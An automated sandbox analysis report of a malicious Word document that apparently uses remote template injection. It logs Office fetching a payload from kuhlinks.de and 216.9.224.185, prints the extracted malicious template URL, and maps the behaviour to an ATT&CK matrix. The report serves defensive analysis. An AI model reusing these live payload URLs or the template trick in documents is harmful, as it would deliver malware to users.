Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: global trafficHTTP traffic detected: GET /3ri5DVX HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: kuhlinks.deConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 216.9.224.185
Source: global trafficDNS traffic detected: DNS query: kuhlinks.de
Source: global trafficDNS traffic detected: DNS query: 185.224.9.216.in-addr.arpa
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60838
Source: unknownNetwork traffic detected: HTTP traffic on port 60838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60843
Source: unknownHTTPS traffic detected: 172.67.144.140:443 -> 192.168.2.24:60832 version: TLS 1.2
Source: classification engineClassification label: mal60.evad.winDOC@2/4@2/2
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$P 7527518303 2507294.docx.docJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{D9E48B00-04A9-4ACE-95E3-17B1C53AFEDC} - OProcSessId.datJump to behavior
Source: IMP 7527518303 2507294.docx.docOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.1.drOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: IMP 7527518303 2507294.docx.docVirustotal: Detection: 13%
Source: IMP 7527518303 2507294.docx.docReversingLabs: Detection: 16%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: IMP 7527518303 2507294.docx.docInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: IMP 7527518303 2507294.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.1.drInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.1.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: IMP 7527518303 2507294.docx.docInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: settings.xml.relsExtracted files from sample: https://goodsubmitbestthings.doc@kuhlinks.de/3ri5dvx
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation
Path Interception1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Exploitation for Client Execution
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
